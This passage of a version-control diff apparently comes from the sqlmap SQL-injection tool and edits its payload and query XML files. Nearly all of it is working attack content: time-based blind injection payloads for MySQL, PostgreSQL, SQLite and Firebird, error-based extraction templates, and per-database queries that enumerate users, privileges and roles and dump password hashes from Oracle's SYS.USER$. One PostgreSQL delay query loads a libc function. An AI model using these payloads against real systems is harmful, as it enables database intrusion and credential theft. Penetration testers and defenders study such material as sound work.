<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
@ -1078,6 +1106,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
|
@ -1097,6 +1126,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
|
@ -1108,25 +1138,6 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
|
|
@ -1134,6 +1145,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
|
|
@ -1154,6 +1166,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
|
|
@ -1167,7 +1180,7 @@ Formats:
|
|||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of AND time-based blind tests -->
|
||||
|
|
@ -1181,6 +1194,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
|
@ -1200,6 +1214,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
|
@ -1211,25 +1226,6 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
|
|
@ -1237,6 +1233,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
|
|
@ -1257,6 +1254,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
|
|
@ -1270,7 +1268,7 @@ Formats:
|
|||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of OR time-based blind tests -->
|
||||
|
|
|
|||
159
xml/queries.xml
159
xml/queries.xml
|
|
@ -24,7 +24,6 @@
|
|||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||
<substring query="MID((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||
<banner query="VERSION()"/>
|
||||
<current_user query="CURRENT_USER()"/>
|
||||
|
|
@ -74,84 +73,6 @@
|
|||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- PostgreSQL -->
|
||||
<dbms value="PostgreSQL">
|
||||
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
||||
|
|
@ -175,7 +96,6 @@
|
|||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||
<banner query="SELECT VERSION()"/>
|
||||
<current_user query="SELECT CURRENT_USER"/>
|
||||
|
|
@ -242,7 +162,6 @@
|
|||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SYSTEM_USER"/>
|
||||
|
|
@ -290,6 +209,83 @@
|
|||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
|
|
@ -477,7 +473,6 @@
|
|||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SUSER_NAME()"/>
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user